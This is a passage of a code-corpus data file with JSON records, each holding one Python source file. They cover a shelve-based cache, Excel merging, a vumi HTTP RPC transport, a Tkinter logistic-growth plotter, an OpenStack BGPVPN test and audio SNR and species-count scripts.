datetime.timedelta(days=365)\n expiration_ms = int(expiration_dt.strftime('%s')) * 1000\n yac_db[key_name] = {'value': value, 'expiration_ms': expiration_ms}\n\n\ndef set_cache_value_dt(key_name, value, expiration_dt=''):\n yac_db = _get_cache()\n if not expiration_dt:\n expiration_dt = datetime.date.today() + datetime.timedelta(days=365)\n expiration_ms = int(expiration_dt.strftime('%s')) * 1000\n yac_db[key_name] = {'value': value, 'expiration_ms': expiration_ms}\n\n\ndef get_cache_value(key_name, default_value={}):\n cache_db = _get_cache()\n time_ms = int(time.time() * 1000)\n if key_name in cache_db and time_ms < cache_db[key_name]['expiration_ms']:\n return cache_db[key_name]['value']\n else:\n return default_value\n\n\ndef delete_cache_value(key_name):\n cache_db = _get_cache()\n if key_name in 
cache_db:\n cache_db.pop(key_name)\n\n\ndef get_cache_keys():\n cache_db = _get_cache()\n return cache_db.keys()\n\n\ndef _get_cache():\n home = os.path.expanduser('~')\n db_home = os.path.join(home, '.yac')\n if not os.path.exists(db_home):\n os.makedirs(db_home)\n yac_db_path = os.path.join(db_home, 'yac_cache')\n cache_db = shelve.open(yac_db_path)\n return cache_db","sub_path":"pycfiles/yac-1.4.6.tar/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"578584002","text":"from openpyxl import load_workbook\n#from openpyxl.styles import Font, Alignment, PatternFill, Color\nimport pandas as pd\nimport glob\nimport os\n\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.lbs.t2k\"\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.nepes.t2k\"\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.nepes.t2k.8para\"\n#my_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.nepes.t2k.12para\"\nmy_folder=\"D:\\\\vm_share\\\\sm5713\\\\hold.lbs.t2k\\\\190412.BLD0182.BLD0208.BLD0213.BLD0213-L1.BLD0216.BLD0225.BLD0226.BLD0261.BLD0316-L1\\\\\"\nos.chdir(my_folder)\n\nheader_size=2\n\nd='.'\nfolder_list = list(filter(lambda x: os.path.isdir(os.path.join(d, x)), os.listdir(d)))\nfolder_list.append('.')\nprint(\"folder list :\",folder_list)\n\nwriter = pd.ExcelWriter('sm5713.yield.trend.xlsx', engine='openpyxl')\n\nyield_data=0\nrow_len=[0]\nfile_cnt=0\n\nfor k in range(len(folder_list)):\n\n os.chdir(folder_list[k])\n file_list = glob.glob(\"*.xls\")\n\n for i in range(len(file_list)):\n\n df = pd.read_excel(file_list[i])\n yield_data+=len(df)-header_size-1 #total length after dropping the leading rows (1~14) and the last row\n row_len.append(yield_data) #start positions are needed for writing out the yield data\n print(file_list[i])\n\n #only rows 1~14 are written once, at the very beginning\n if file_cnt==0:\n df[:header_size].to_excel(writer, startrow=0, index=False, header=False)\n print(df.columns[2],df.columns[3])\n df[header_size:-1].to_excel(writer, startrow=row_len[file_cnt]+header_size, index=False, header=False) #+header_size because rows 1~14 were written first\n file_cnt+=1\n\n if len(folder_list)-1!=k: #do not chdir for the last folder; this keeps the output file from being created inside a subfolder\n os.chdir('..')\n\nwriter.save()","sub_path":"holdlot/holdlot.py","file_name":"holdlot.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"372314867","text":"# -*- test-case-name: vumi.transports.httprpc.tests.test_httprpc -*-\n\nimport json\n\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.python import log\nfrom twisted.web import http\nfrom twisted.web.resource import Resource\nfrom twisted.web.server import NOT_DONE_YET\n\nfrom vumi.transports.base import Transport\n\n\nclass HttpRpcHealthResource(Resource):\n isLeaf = True\n\n def __init__(self, transport):\n self.transport = transport\n Resource.__init__(self)\n\n def render_GET(self, request):\n request.setResponseCode(http.OK)\n return self.transport.get_health_response()\n\n\nclass HttpRpcResource(Resource):\n isLeaf = True\n\n def __init__(self, transport):\n self.transport = transport\n Resource.__init__(self)\n\n def render_(self, request, http_action=None):\n log.msg(\"HttpRpcResource HTTP Action: %s\" % (request,))\n request.setHeader(\"content-type\", \"text/plain\")\n msgid = Transport.generate_message_id()\n self.transport.requests[msgid] = request\n self.transport.handle_raw_inbound_message(msgid, request)\n return NOT_DONE_YET\n\n def render_PUT(self, request):\n return self.render_(request, \"render_PUT\")\n\n def render_GET(self, request):\n return self.render_(request, \"render_GET\")\n\n def render_POST(self, request):\n return self.render_(request, \"render_POST\")\n\n\nclass HttpRpcTransport(Transport):\n \"\"\"Base class for synchronous HTTP transports.\n\n Because a reply from an application worker is needed before the HTTP\n response can be completed, a reply needs to be returned to the same\n transport worker that generated the inbound message. This means that\n currently there may only be one transport worker for each instance\n of this transport of a given name.\n \"\"\"\n\n def get_transport_url(self, suffix=''):\n \"\"\"\n Get the URL for the HTTP resource. 
Requires the worker to be started.\n\n This is mostly useful in tests, and probably shouldn't be used\n in non-test code, because the API might live behind a load\n balancer or proxy.\n \"\"\"\n addr = self.web_resource.getHost()\n return \"http://%s:%s/%s\" % (addr.host, addr.port, suffix.lstrip('/'))\n\n @inlineCallbacks\n def setup_transport(self):\n self.requests = {}\n\n # start receipt web resource\n self.web_resource = yield self.start_web_resources(\n [\n (HttpRpcResource(self), self.config['web_path']),\n (HttpRpcHealthResource(self), 'health'),\n ],\n self.config['web_port'])\n\n @inlineCallbacks\n def teardown_transport(self):\n yield self.web_resource.loseConnection()\n\n def get_health_response(self):\n return json.dumps({\n 'pending_requests': len(self.requests)\n })\n\n def handle_outbound_message(self, message):\n log.msg(\"HttpRpcTransport consuming %s\" % (message))\n if message.payload.get('in_reply_to') and 'content' in message.payload:\n self.finish_request(\n message.payload['in_reply_to'],\n message.payload['content'].encode('utf-8'))\n\n def handle_raw_inbound_message(self, msgid, request):\n raise NotImplementedError(\"Sub-classes should implement\"\n \" handle_raw_inbound_message.\")\n\n def finish_request(self, msgid, data, code=200):\n log.msg(\"HttpRpcTransport.finish_request with data:\", repr(data))\n log.msg(repr(self.requests))\n request = self.requests.get(msgid)\n if request:\n request.setResponseCode(code)\n request.write(data)\n request.finish()\n del self.requests[msgid]\n response_id = \"%s:%s:%s\" % (request.client.host,\n request.client.port,\n Transport.generate_message_id())\n return response_id\n","sub_path":"vumi/transports/httprpc/httprpc.py","file_name":"httprpc.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193758880","text":"from noble import Noble\nfrom warrior import Warrior\n\n\ndef main():\n art = Noble(\"King Arthur\")\n lance = Noble(\"Lancelot du Lac\")\n jim = Noble(\"Jim\")\n linus = Noble(\"Linus Torvalds\")\n billie = Noble(\"Bill Gates\")\n \n cheetah = Warrior(\"Tarzan\", 10)\n wizard = Warrior(\"Merlin\", 15)\n theGovernator = Warrior(\"Conan\", 12)\n nimoy = Warrior(\"Spock\", 15)\n lawless = Warrior(\"Xena\", 20)\n mrGreen = Warrior(\"Hulk\", 8)\n dylan = Warrior(\"Hercules\", 3)\n \n jim.hire(nimoy)\n lance.hire(theGovernator)\n art.hire(wizard)\n lance.hire(dylan)\n linus.hire(lawless)\n billie.hire(mrGreen)\n art.hire(cheetah)\n\n jim.display()\n lance.display()\n art.display()\n linus.display()\n billie.display()\n\n art.fire(cheetah)\n art.display()\n\n art.battle(lance)\n jim.battle(lance)\n linus.battle(billie)\n billie.battle(lance)\n\n\nmain()\n","sub_path":"Homework/hw03/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418479354","text":"import numpy as np\nfrom STFTsignal import audiosignal, getSTFTofFile, stft_of_signal\nimport matplotlib.pyplot as plt\n\naudiofile =(\"lyd/Band of Horses - The Funeral.wav\", \"lyd/Manowar - Kings of Metal.wav\")\n\ndef addNoise_and_STFT(audioArray, samplingrate, noise):\n \"\"\"\n Parameters\n ----------\n audioArray : TYPE, array of int16\n DESCRIPTION: Amplitude content in audiofile\n samplingrate : TYPE int\n DESCRIPTION sample rate of audiofile\n noise : TYPE float\n DESCRIPTION variance of added gaussian noise with mean = 0\n Returns\n -------\n 
ZxxNoisy : TYPE array of float64\n DESCRIPTION STFT of noisy audio\n noisyAudio : TYPE array\n DESCRIPTION Amplitude content in audiofile added noise\n\n \"\"\"\n noisyAudio = audioArray + np.random.randn(audioArray.size) * noise #adds noise\n _, _, ZxxNoisy = stft_of_signal(noisyAudio, samplingrate) #STFT\n \n return ZxxNoisy, noisyAudio\n\ndef power (signalArray):\n power = 1/(len(signalArray))*sum(signalArray**2)\n return power\n\n\ndef plotSNR(audiofile, noiseRange=\"range(0,int(max(audio)*2), int(max(audio)*2/100))\"):\n \"\"\"\n Plot of SNR as a function of variated noise added to audiofile. \n \n Parameters\n ----------\n audiofile : TYPE .wav file\n noiseRange : TYPE, optional, str\n DESCRIPTION: range of added noise\n The default is \"range(0,int(max(audio)*2), int(max(audio)*2/100))\".\n\n Returns\n -------\n SNR : TYPE array of SNR values\n\n \"\"\"\n samplingrate, audio = audiosignal(audiofile)\n audio = audio + np.random.randn(audio.size) * 0\n #noise is added in noiseRange\n SNR = [power(audio)/power(addNoise_and_STFT(audio, samplingrate, i)[1]) for i in eval(noiseRange)]\n \n plt.figure()\n plt.grid()\n plt.semilogx(20*np.log(SNR))\n plt.xlabel(\"samples\")\n plt.ylabel(\"SNR [DB]\")\n \n return SNR\n\n\nif __name__ == '__main__':\n plotSNR(audiofile[1])","sub_path":"SignalToNoiseRatio.py","file_name":"SignalToNoiseRatio.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18711478","text":"#-------------------------------------------------------------------------------\r\n# Name: 106Bombyx\r\n# Purpose:\r\n#\r\n# Author: laviel_a\r\n#\r\n# Created: 10/02/2015\r\n# Copyright: (c) laviel_a 2015\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\nfrom Tkinter import *\r\n\r\ngen_tab = [10.0]\r\ngen_tab3 = [10.0]\r\ngen_tab2 = []\r\nchoix = -1\r\nk = 0\r\nmini = 0\r\nmaxi = 0\r\nboolean = 0\r\n\r\ndef get_minmax():\r\n global Fenetre\r\n global entree\r\n global choix\r\n global boolean\r\n global k\r\n global mini\r\n global maxi\r\n boolean = 0\r\n mini = entree.get()\r\n maxi = entree2.get()\r\n i = 0\r\n while i < len(mini):\r\n if mini[i] != '0' and mini[i] != '1' and mini[i] != '2' and mini[i] != '3' and mini[i] != '4' and mini[i] != '5' and mini[i] != '6' and mini[i] != '7' and mini[i] != '8' and mini[i] != '9':\r\n boolean = 4\r\n i = i + 1\r\n i = 0\r\n while i < len(maxi):\r\n if maxi[i] != '0' and maxi[i] != '1' and maxi[i] != '2' and maxi[i] != '3' and maxi[i] != '4' and maxi[i] != '5' and maxi[i] != '6' and maxi[i] != '7' and maxi[i] != '8' and maxi[i] != '9':\r\n boolean = 4\r\n i = i + 1\r\n if len(mini) == 0 or len(maxi) == 0:\r\n boolean = 3\r\n if boolean != 0:\r\n k = 0\r\n else:\r\n mini = int(mini)\r\n maxi = int(maxi)\r\n k = 1.00\r\n if mini < 1 or mini > maxi:\r\n k = 0\r\n mini = 0\r\n maxi = 0\r\n boolean = 5\r\n Fenetre.destroy()\r\n\r\ndef bouton1():\r\n global choix\r\n global Fenetre\r\n choix = 0\r\n Fenetre.destroy()\r\n\r\ndef bouton2():\r\n global choix\r\n global Fenetre\r\n choix = 1\r\n Fenetre.destroy()\r\n\r\ndef bouton3():\r\n global k\r\n global Fenetre\r\n global entree\r\n global choix\r\n global boolean\r\n boolean = 0\r\n k = entree.get()\r\n i = 0\r\n while (i < len(k)):\r\n if k[i] != '0' and k[i] != '1' and k[i] != '2' and k[i] != '3' and k[i] != '4' and k[i] != '5' and k[i] != '6' and k[i] != '7' and k[i] != '8' and k[i] != '9' and (k[i] != '.' 
and boolean == 0):\r\n boolean = 2\r\n elif k[i] == '.':\r\n boolean = 1\r\n i = i + 1\r\n if len(k) == 0:\r\n boolean = 3\r\n if boolean >= 2:\r\n k = 0\r\n else:\r\n k = float(k)\r\n if k < 1 or k > 4:\r\n boolean = 6\r\n k = 0\r\n Fenetre.destroy()\r\n\r\ndef bouton4():\r\n global choix\r\n global Fenetre\r\n choix = 2\r\n global k\r\n k = -1\r\n Fenetre.destroy()\r\n\r\nFenetre = Tk()\r\nbutton1 = Button(Fenetre, text=\"Option 1\", command=bouton1)\r\nbutton2 = Button(Fenetre, text=\"Option 2\", command=bouton2)\r\nbutton1.pack(side=LEFT), button2.pack(side=LEFT)\r\nFenetre.mainloop()\r\n\r\nif choix == 0:\r\n while k == 0 and choix == 0:\r\n k = -1\r\n Fenetre = Tk()\r\n label3 = Label(Fenetre, text=\"Taux de Croissance\").grid(row = 0, column = 0)\r\n entree = Entry(Fenetre)\r\n entree.grid(row = 0, column = 1)\r\n labeltroll = Label(Fenetre, text=\"\").grid(row = 1, column = 0)\r\n button3 = Button(Fenetre, text=\"Valider\", command=bouton3).grid(row = 2, column = 0)\r\n button4 = Button(Fenetre, text=\"Quitter le Programme\", command=bouton4).grid(row = 2, column = 1)\r\n if boolean == 2:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \"Only numbers are accepted ! Please try again.\").grid(row = 3, column = 0, columnspan = 2)\r\n if boolean == 3:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \" Please enter something in the box. \").grid(row = 3, column = 0, columnspan = 2)\r\n if boolean == 6:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \"The growth rate have to be between 1 and 4 ! Please try again.\").grid(row = 3, column = 0, columnspan = 2)\r\n Fenetre.mainloop()\r\n if k == -1 or choix == 2:\r\n exit()\r\n i = 0\r\n while i < 100:\r\n gen_tab.append(k * gen_tab[i] * ((1000 - gen_tab[i]) / 1000))\r\n i = i + 1\r\n max_value = float(int((max(gen_tab) - 0.01) / 100 + 1))\r\n Fenetre = Tk()\r\n draw = Canvas(Fenetre, width = 600, height = 600)\r\n draw.pack()\r\n draw.create_line(50, 50, 50, 550)\r\n draw.create_line(50, 550, 550, 550)\r\n i = 0\r\n while i <= max_value:\r\n draw.create_line(45, 500 / max_value * i + 50, 55, 500 / max_value * i + 50)\r\n draw.create_text(22.5, 500 / max_value * i + 50, text=str(int(max_value * 100 - i * 100)))\r\n i = i + 1\r\n i = 0\r\n while i < 6:\r\n draw.create_line(i * 100 + 50, 545, i * 100 + 50, 555)\r\n draw.create_text(i * 100 + 50, 565, text=str(int(i * 20)))\r\n i = i + 1\r\n i = 0\r\n while i < len(gen_tab) - 1:\r\n draw.create_line(5 * i + 50, 550.0 - (gen_tab[i] / (max_value * 100)) * 500, 5 * (i + 1) + 50, 550.0 - (gen_tab[i + 1] / (max_value * 100)) * 500, fill=\"RED\")\r\n i = i + 1\r\n Fenetre.mainloop()\r\n\r\nelif choix == 1:\r\n while k == 0 and choix == 1:\r\n k = -1\r\n Fenetre = Tk()\r\n label1 = Label(Fenetre, text=\"Generation minimale\").grid(row = 0, column = 0)\r\n entree = Entry(Fenetre)\r\n entree.grid(row = 0, column = 1)\r\n label2 = Label(Fenetre, text=\"Generation maximale\").grid(row = 1, column = 0)\r\n entree2 = Entry(Fenetre)\r\n entree2.grid(row = 1, column = 1)\r\n labeltroll = Label(Fenetre, text=\" \").grid(row = 2, column = 0)\r\n button3 = Button(Fenetre, text=\"Valider\", command=get_minmax).grid(row = 3, column = 0)\r\n button4 = Button(Fenetre, text=\"Quitter le Programme\", command=bouton4).grid(row = 3, column = 1)\r\n if boolean == 3:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \" Please enter something in the boxes \").grid(row = 2, column = 0, columnspan = 2)\r\n if boolean == 4:\r\n label4 = Label(Fenetre, bg=\"RED\", 
fg=\"WHITE\", text = \"Only integers are accepted in the boxes! Please try again.\").grid(row = 2, column = 0, columnspan = 2)\r\n if boolean == 5:\r\n label4 = Label(Fenetre, bg=\"RED\", fg=\"WHITE\", text = \"Minimum is superior to maximum ! Please try again.\").grid(row = 2, column = 0, columnspan = 2)\r\n Fenetre.mainloop()\r\n if k == -1 or choix == 2:\r\n exit()\r\n k = 1\r\n Fenetre = Tk()\r\n draw = Canvas(Fenetre, width = 600, height = 600)\r\n draw.pack()\r\n while k <= 4:\r\n i = 0\r\n gen_tab = [10.0]\r\n while i <= maxi:\r\n gen_tab.append(k * gen_tab[i] * ((1000 - gen_tab[i]) / 1000))\r\n i = i + 1\r\n gen_tab = gen_tab[mini:maxi + 1]\r\n gen_tab2 = gen_tab2 + gen_tab\r\n k = k + 0.1\r\n max_value = float(int((max(gen_tab2) - 0.01) / 100 + 1))\r\n draw.create_line(50, 50, 50, 550)\r\n draw.create_line(50, 550, 550, 550)\r\n i = 0\r\n while i <= max_value:\r\n draw.create_line(45, 500 / max_value * i + 50, 55, 500 / max_value * i + 50)\r\n draw.create_text(22.5, 500 / max_value * i + 50, text=str(int(max_value * 100 - i * 100)))\r\n i = i + 1\r\n i = 0\r\n while i < 7:\r\n draw.create_line(i * 83.3 + 50, 545, i * 83.3 + 50, 555)\r\n draw.create_text(i * 83.3 + 50, 565, text=str(float(i * 0.5 + 1)))\r\n i = i + 1\r\n k = 1.0\r\n while k < 4:\r\n i = 0\r\n gen_tab = [10.0]\r\n gen_tab3 = [10.0]\r\n while i <= maxi:\r\n gen_tab.append(k * gen_tab[i] * ((1000 - gen_tab[i]) / 1000))\r\n gen_tab3.append((k + 0.1) * gen_tab3[i] * ((1000 - gen_tab3[i]) / 1000))\r\n i = i + 1\r\n i = mini\r\n while i < maxi:\r\n color = \"0000\"\r\n color = color + (str(hex(int(((i - mini) * 255) / (maxi - mini)))[2:]))\r\n if len(str(hex(int(((i - mini) * 255) / (maxi - mini)))[2:])) == 1:\r\n color = color + \"0\"\r\n color = color + (\"#\")\r\n color = color[::-1]\r\n draw.create_line((k - 1.0) * 166.7 + 50, 550 - (gen_tab[i] / (max_value * 100) * 500), (k - 0.9) * 166.7 + 50, 550 - (gen_tab3[i] / (max_value * 100) * 500), fill=color)\r\n i = i + 1\r\n k = k + 0.1\r\n Fenetre.mainloop()\r\n","sub_path":"106bombyx.py","file_name":"106bombyx.py","file_ext":"py","file_size_in_byte":8205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139051572","text":"#!/usr/bin/env python\n#\n# Copyright (c) 2017 All rights reserved\n# This program and the accompanying materials\n# are made available under the terms of the Apache License, Version 2.0\n# which accompanies this distribution, and is available at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n\nimport logging\nimport sys\n\nfrom random import randint\nfrom sdnvpn.lib import config as sdnvpn_config\nfrom sdnvpn.lib import openstack_utils as os_utils\nfrom sdnvpn.lib import utils as test_utils\nfrom sdnvpn.lib.results import Results\n\n\nlogger = logging.getLogger(__name__)\n\nCOMMON_CONFIG = sdnvpn_config.CommonConfig()\nTESTCASE_CONFIG = sdnvpn_config.TestcaseConfig(\n 'sdnvpn.test.functest.testcase_4')\n\n\ndef main():\n conn = os_utils.get_os_connection()\n results = Results(COMMON_CONFIG.line_length, conn)\n\n results.add_to_summary(0, \"=\")\n results.add_to_summary(2, \"STATUS\", \"SUBTEST\")\n results.add_to_summary(0, \"=\")\n\n neutron_client = os_utils.get_neutron_client()\n\n (floatingip_ids, instance_ids, router_ids, network_ids, image_ids,\n subnet_ids, interfaces, bgpvpn_ids) = ([] for i in range(8))\n\n try:\n image_id = os_utils.create_glance_image(\n conn, TESTCASE_CONFIG.image_name,\n COMMON_CONFIG.image_path, disk=COMMON_CONFIG.image_format,\n container=\"bare\", 
public='public')\n image_ids.append(image_id)\n\n network_1_id, subnet_1_id, router_1_id = test_utils.create_network(\n conn,\n TESTCASE_CONFIG.net_1_name,\n TESTCASE_CONFIG.subnet_1_name,\n TESTCASE_CONFIG.subnet_1_cidr,\n TESTCASE_CONFIG.router_1_name)\n\n network_2_id = test_utils.create_net(\n conn,\n TESTCASE_CONFIG.net_2_name)\n\n subnet_2_id = test_utils.create_subnet(\n conn,\n TESTCASE_CONFIG.subnet_2_name,\n TESTCASE_CONFIG.subnet_2_cidr,\n network_2_id)\n interfaces.append(tuple((router_1_id, subnet_1_id)))\n network_ids.extend([network_1_id, network_2_id])\n router_ids.append(router_1_id)\n subnet_ids.extend([subnet_1_id, subnet_2_id])\n\n sg_id = os_utils.create_security_group_full(\n conn,\n TESTCASE_CONFIG.secgroup_name,\n TESTCASE_CONFIG.secgroup_descr)\n\n compute_nodes = test_utils.assert_and_get_compute_nodes(conn)\n\n av_zone_1 = \"nova:\" + compute_nodes[0]\n av_zone_2 = \"nova:\" + compute_nodes[1]\n\n # boot INTANCES\n vm_2 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_2_name,\n image_id,\n network_1_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_1)\n vm_2_ip = test_utils.get_instance_ip(conn, vm_2)\n\n vm_3 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_3_name,\n image_id,\n network_1_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_2)\n vm_3_ip = test_utils.get_instance_ip(conn, vm_3)\n\n vm_5 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_5_name,\n image_id,\n network_2_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_2)\n vm_5_ip = test_utils.get_instance_ip(conn, vm_5)\n\n # We boot vm5 first because we need vm5_ip for vm4 userdata\n u4 = test_utils.generate_ping_userdata([vm_5_ip])\n vm_4 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_4_name,\n image_id,\n network_2_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_1,\n userdata=u4)\n vm_4_ip = test_utils.get_instance_ip(conn, vm_4)\n\n # We boot VM1 at the end because we need to get the IPs\n # first to generate the userdata\n u1 = test_utils.generate_ping_userdata([vm_2_ip,\n vm_3_ip,\n vm_4_ip,\n vm_5_ip])\n vm_1 = test_utils.create_instance(\n conn,\n TESTCASE_CONFIG.instance_1_name,\n image_id,\n network_1_id,\n sg_id,\n secgroup_name=TESTCASE_CONFIG.secgroup_name,\n compute_node=av_zone_1,\n userdata=u1)\n\n instance_ids.extend([vm_1.id, vm_2.id, vm_3.id, vm_4.id, vm_5.id])\n\n msg = (\"Create VPN with eRT<>iRT\")\n results.record_action(msg)\n vpn_name = \"sdnvpn-\" + str(randint(100000, 999999))\n kwargs = {\n \"import_targets\": TESTCASE_CONFIG.targets1,\n \"export_targets\": TESTCASE_CONFIG.targets2,\n \"route_distinguishers\": TESTCASE_CONFIG.route_distinguishers,\n \"name\": vpn_name\n }\n bgpvpn = test_utils.create_bgpvpn(neutron_client, **kwargs)\n bgpvpn_id = bgpvpn['bgpvpn']['id']\n logger.debug(\"VPN created details: %s\" % bgpvpn)\n bgpvpn_ids.append(bgpvpn_id)\n\n msg = (\"Associate router '%s' to the VPN.\" %\n TESTCASE_CONFIG.router_1_name)\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n\n test_utils.create_router_association(\n neutron_client, bgpvpn_id, router_1_id)\n\n # Wait for VMs to get ips.\n instances_up = test_utils.wait_for_instances_up(vm_2, vm_3, vm_5)\n instances_dhcp_up = test_utils.wait_for_instances_get_dhcp(vm_1, vm_4)\n\n if (not instances_up or not instances_dhcp_up):\n logger.error(\"One or more instances are down\")\n # TODO: Handle this 
appropriately\n\n results.get_ping_status(vm_1, vm_2, expected=\"PASS\", timeout=200)\n results.get_ping_status(vm_1, vm_3, expected=\"PASS\", timeout=30)\n results.get_ping_status(vm_1, vm_4, expected=\"FAIL\", timeout=30)\n\n msg = (\"Associate network '%s' to the VPN.\" %\n TESTCASE_CONFIG.net_2_name)\n results.add_to_summary(0, \"-\")\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n test_utils.create_network_association(\n neutron_client, bgpvpn_id, network_2_id)\n\n test_utils.wait_for_bgp_router_assoc(\n neutron_client, bgpvpn_id, router_1_id)\n test_utils.wait_for_bgp_net_assoc(\n neutron_client, bgpvpn_id, network_2_id)\n\n logger.info(\"Waiting for the VMs to connect to each other using the\"\n \" updated network configuration\")\n test_utils.wait_before_subtest()\n\n results.get_ping_status(vm_4, vm_5, expected=\"PASS\", timeout=30)\n # TODO enable again when isolation in VPN with iRT != eRT works\n # results.get_ping_status(vm_1, vm_4, expected=\"FAIL\", timeout=30)\n # results.get_ping_status(vm_1, vm_5, expected=\"FAIL\", timeout=30)\n\n msg = (\"Update VPN with eRT=iRT ...\")\n results.add_to_summary(0, \"-\")\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n\n # use bgpvpn-create instead of update till NETVIRT-1067 bug is fixed\n # kwargs = {\"import_targets\": TESTCASE_CONFIG.targets1,\n # \"export_targets\": TESTCASE_CONFIG.targets1,\n # \"name\": vpn_name}\n # bgpvpn = test_utils.update_bgpvpn(neutron_client,\n # bgpvpn_id, **kwargs)\n\n test_utils.delete_bgpvpn(neutron_client, bgpvpn_id)\n bgpvpn_ids.remove(bgpvpn_id)\n kwargs = {\n \"import_targets\": TESTCASE_CONFIG.targets1,\n \"export_targets\": TESTCASE_CONFIG.targets1,\n \"route_distinguishers\": TESTCASE_CONFIG.route_distinguishers,\n \"name\": vpn_name\n }\n\n test_utils.wait_before_subtest()\n\n bgpvpn = test_utils.create_bgpvpn(neutron_client, **kwargs)\n bgpvpn_id = bgpvpn['bgpvpn']['id']\n logger.debug(\"VPN re-created details: %s\" % bgpvpn)\n bgpvpn_ids.append(bgpvpn_id)\n\n msg = (\"Associate again network '%s' and router '%s 'to the VPN.\"\n % (TESTCASE_CONFIG.net_2_name,\n TESTCASE_CONFIG.router_1_name))\n results.add_to_summary(0, \"-\")\n results.record_action(msg)\n results.add_to_summary(0, \"-\")\n\n test_utils.create_router_association(\n neutron_client, bgpvpn_id, router_1_id)\n\n test_utils.create_network_association(\n neutron_client, bgpvpn_id, network_2_id)\n\n test_utils.wait_for_bgp_router_assoc(\n neutron_client, bgpvpn_id, router_1_id)\n test_utils.wait_for_bgp_net_assoc(\n neutron_client, bgpvpn_id, network_2_id)\n # The above code has to be removed after re-enabling bgpvpn-update\n\n logger.info(\"Waiting for the VMs to connect to each other using the\"\n \" updated network configuration\")\n test_utils.wait_before_subtest()\n\n # TODO: uncomment the following once ODL netvirt fixes the following\n # bug: https://jira.opendaylight.org/browse/NETVIRT-932\n # results.get_ping_status(vm_1, vm_4, expected=\"PASS\", timeout=30)\n # results.get_ping_status(vm_1, vm_5, expected=\"PASS\", timeout=30)\n\n results.add_to_summary(0, \"=\")\n logger.info(\"\\n%s\" % results.summary)\n\n except Exception as e:\n logger.error(\"exception occurred while executing testcase_4: %s\", e)\n raise\n finally:\n test_utils.cleanup_nova(conn, instance_ids)\n test_utils.cleanup_glance(conn, image_ids)\n test_utils.cleanup_neutron(conn, neutron_client, floatingip_ids,\n bgpvpn_ids, interfaces, subnet_ids,\n router_ids, network_ids)\n\n return results.compile_summary()\n\n\nif 
__name__ == '__main__':\n sys.exit(main())\n","sub_path":"sdnvpn/test/functest/testcase_4.py","file_name":"testcase_4.py","file_ext":"py","file_size_in_byte":9996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"11786946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Oct 25 11:01:20 2017\n\n@author: yi.yan\n\"\"\"\n\ndef funFDAARGOSProcessSpeciesCount(sFileName):\n import xlsxwriter\n import math \n from scipy.stats import t \n \n alpha = 1 - 0.99\n CriticalProbability = 1 - alpha/2 \n \n \n #sFileName = 'PFDA1_20170908_M00708_IL100092259_TAATGCG_L001_R1_trimmed_10000_Count.txt'\n lTable = []\n Header = ('Specie Name','Tax ID','Count','Percentage','Total Hit','99% Confidence Interval')\n file_object = open(sFileName, 'r') \n \n TotalHit = 0\n for line in file_object.readlines(): \n temp = line.split() \n TotalHit = TotalHit + int(temp[0]) \n \n file_object.close()\n \n DegreesFreedom = TotalHit - 1 \n tStat = t.ppf(CriticalProbability,DegreesFreedom)\n file_object = open(sFileName, 'r') \n for line in file_object.readlines(): \n temp = line.split() \n SpecieName = temp[2] \n for j in range(2,len(temp)):\n SpecieName = SpecieName + ' ' + temp[j]\n TaxID = temp[1] \n Count = int(temp[0])\n Percentage = Count/TotalHit \n SE = math.sqrt(Percentage*(1-Percentage)/TotalHit)\n CI = SE*tStat*100 \n Percentage = Percentage*100 \n tempTup = (SpecieName,TaxID,Count,Percentage,TotalHit,CI)\n lTable.append(tempTup)\n \n s = sorted(lTable,key=lambda x:(x[2]),reverse=True)\n \n workbook = xlsxwriter.Workbook(sFileName[0:-4]+'.xlsx')\n worksheet = workbook.add_worksheet()\n \n for j in range(0,len(Header)):\n worksheet.write(0,j,Header[j])\n \n for i in range(0,len(s)):\n for j in range(0,len(s[i])):\n worksheet.write(i+1,j,s[i][j])\n \n workbook.close()","sub_path":"funFDAARGOSProcessSpecieCount.py","file_name":"funFDAARGOSProcessSpecieCount.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 